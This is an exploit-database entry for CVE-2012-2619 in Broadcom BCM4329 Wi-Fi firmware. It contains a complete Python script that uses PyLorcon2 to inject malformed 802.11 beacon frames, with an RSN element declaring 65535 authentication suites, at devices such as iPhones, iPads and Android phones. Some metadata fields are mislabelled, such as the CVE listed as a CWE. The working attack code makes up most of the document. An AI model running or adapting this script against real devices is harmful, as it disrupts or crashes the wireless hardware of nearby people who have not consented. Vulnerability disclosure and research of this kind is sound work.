Exploit for BCM4329 Chipset

vendor:

BCM4329 Firmware

by:

CoreLabs (Core Security Technologies)

8,8

CVSS

HIGH

Buffer Overflow

119

CWE

Product Name: BCM4329 Firmware

Affected Version From: 1.0

Affected Version To: 1.0

Patch Exists: YES

Related CWE: 2012-2619

CPE: a:broadcom:bcm4329_firmware

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Apple iPhone 3GS, Apple iPod 2G, HTC Touch Pro 2, HTC Droid Incredible, Samsung Spica, Acer Liquid, Motorola Devour, Ford Edge, Apple iPhone 4, Apple iPhone 4 Verizon, Apple iPod 3G, Apple iPad Wi-Fi, Apple iPad 3G, Apple iPad 2, Apple Tv 2G, Motorola Xoom, Motorola Droid X2, Motorola Atrix, Samsung Galaxy Tab, Samsung Galaxy S 4G, Samsung Nexus S, Samsung Stratosphere, Samsung Fascinate, HTC Nexus One, HTC Evo 4G, HTC ThunderBolt, HTC Droid Incredible 2, LG Revolution, Sony Ericsson Xperia Play, Pantech Breakout, Nokia Lumina 800, Kyocera Echo, Asus Transformer Prime, Malata ZPad

2012

Exploit for BCM4329 Chipset

This exploit is a python script that generates a beacon frame with a sequence number of 4096. The frame control, frame body, information elements, and vendor specific elements are all included in the frame. The frame is then sent to the affected devices with the BCM4329 chipset.

Mitigation:

Update to the latest version of the chipset.

Source

Exploit-DB raw data:

# Exploit Author:
CoreLabs (Core Security Technologies) fue descubierta por el 
investigador argentino Andrés Blanco,
# Vendor Homepage: 
# Software Link: [download link if available]
# Version: 1.0
# Tested on: 
Apple iPhone 3GS 
Apple iPod 2G 
HTC Touch Pro 2 
HTC Droid Incredible 
Samsung Spica 
Acer Liquid 
Motorola Devour 
Vehículo Ford Edge 
Dispositivos afectados con el chipset BCM4329: 
Apple iPhone 4 
Apple iPhone 4 Verizon 
Apple iPod 3G 
Apple iPad Wi-Fi 
Apple iPad 3G 
Apple iPad 2 
Apple Tv 2G 
Motorola Xoom 
Motorola Droid X2 
Motorola Atrix 
Samsung Galaxy Tab 
Samsung Galaxy S 4G 
Samsung Nexus S 
Samsung Stratosphere 
Samsung Fascinate 
HTC Nexus One 
HTC Evo 4G 
HTC ThunderBolt 
HTC Droid Incredible 2 
LG Revolution 
Sony Ericsson Xperia Play 
Pantech Breakout 
Nokia Lumina 800 
Kyocera Echo 
Asus Transformer Prime 
Malata ZPad"

# CVE : 2012-2619
#!/usr/bin/env python 

import sys 
import time 
import struct 
import PyLorcon2 

def beaconFrameGenerator(): 
    sequence = 0 
    while(1): 
        sequence = sequence % 4096 

        # Frame Control 
        frame = '\x80' # Version: 0 - Type: Managment - Subtype: Beacon 
        frame += '\x00' # Flags: 0 
        frame += '\x00\x00' # Duration: 0 
        frame += '\xff\xff\xff\xff\xff\xff' # Destination: ff:ff:ff:ff:ff:ff 
        frame += '\x00\x00\x00\x15\xde\xad' # Source: 00:00:00:15:de:ad 
        frame += '\x00\x00\x00\x15\xde\xad' # BSSID: 00:00:00:15:de:ad 
        frame += struct.pack('H', sequence) # Fragment: 0 - Sequenence: 
#part of the generator 
        # Frame Body 
        frame += struct.pack('Q', time.time()) # Timestamp 
        frame += '\x64\x00' # Beacon Interval: 0.102400 seconds 
        frame += '\x11\x04' # Capability Information: ESS, Privacy, 
#Short Slot time 
        # Information Elements 
        # SSID: buggy 
        frame += '\x00\x05buggy' 
        # Supported Rates: 1,2,5.5,11,18,24,36,54 
        frame += '\x01\x08\x82\x84\x8b\x96\x24\x30\x48\x6c' 
        # DS Parameter Set: 6 
        frame += '\x03\x01\x06' 
        # RSN IE 
        frame += '\x30' # ID: 48 
        frame += '\x14' # Size: 20 
        frame += '\x01\x00' # Version: 1 
        frame += '\x00\x0f\xac\x04' # Group cipher suite: TKIP 
        frame += '\x01\x00' # Pairwise cipher suite count: 1 
        frame += '\x00\x0f\xac\x00' # Pairwise cipher suite 1: TKIP 
        frame += '\xff\xff' # Authentication suites count: 65535 
        frame += '\x00\x0f\xac\x02' # Pairwise authentication suite 2: PSK 
        frame += '\x00\x00' 

        sequence += 1 
        yield frame 

if __name__ == "__main__": 
    if len(sys.argv) != 2: 
        print "Usage:" 
        print "\t%s <wireless interface>" % sys.argv[0] 
        sys.exit(-1) 

    iface = sys.argv[1] 
    context = PyLorcon2.Context(iface) 
    context.open_injmon() 

    generator = beaconFrameGenerator() 

    for i in range(10000): 
        frame = generator.next() 
        time.sleep(0.100) 
        context.send_bytes(frame)